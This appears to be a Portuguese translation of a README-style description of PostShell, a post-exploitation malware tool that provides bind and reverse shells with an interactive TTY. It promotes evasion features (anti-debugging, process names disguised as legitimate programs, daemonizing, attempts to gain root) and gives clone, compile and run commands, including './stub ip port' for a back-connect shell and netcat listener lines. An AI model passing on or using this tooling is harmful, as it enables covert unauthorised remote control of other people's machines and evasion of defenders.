O PostShell é um shell pós-exploração que inclui um shell de ligação e um de conexão traseira. Ele cria um TTY totalmente interativo que permite o controle do trabalho. O tamanho do stub é de cerca de 14kb e pode ser compilado em qualquer sistema semelhante ao Unix .
Por que não usar um Backconnect / Bind Shell tradicional?
O PostShell permite uma pós-exploração mais fácil, tornando o invasor menos dependente de dependências como Python e Perl. Ele também incorpora um shell de conexão traseira e ligação, o que significa que, se um destino não permitir conexões de saída, um operador pode simplesmente iniciar um shell de ligação e conectar-se à máquina remotamente. O PostShell também é significativamente menos suspeito do que um shell tradicional, devido ao fato de o nome dos processos e argumentos estarem ocultos.
Recursos
- Anti-Debugging, se o ptrace for detectado como anexado ao shell, ele sairá.
- Os nomes de processos / threads são encobertos, um nome falso substitui todos os argumentos do sistema e o nome do arquivo para parecer um programa legítimo.
- TTY, é criado um TTY que essencialmente permite o mesmo uso da máquina como se você estivesse conectado via SSH.
- Shell de ligação / conexão traseira, tanto um shell de ligação como uma conexão traseira podem ser criados.
- Tamanho de esboço pequeno, geralmente é gerado um esboço muito pequeno (<14kb).
- Daemonizes automaticamente
- Tenta definir GUID / UID como 0 (raiz)
Começando
- Baixando:
git clone https://github.com/rek7/postshell - Compilando:
cd postshell && sh compile.shIsso deve criar um binário chamado “stub”, que é o malware.
Comandos
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$Exemplo de
Backconnect de uso :
$ ./stub 127.0.0.1 13377Shell de ligação:
$ ./stub 13377Recebendo uma conexão com o Netcat
Recebendo uma backconnect:
$ nc -vlp portConectando a um Shell de ligação:
$ nc host portFAÇAM:
- Adicionar resolução de domínio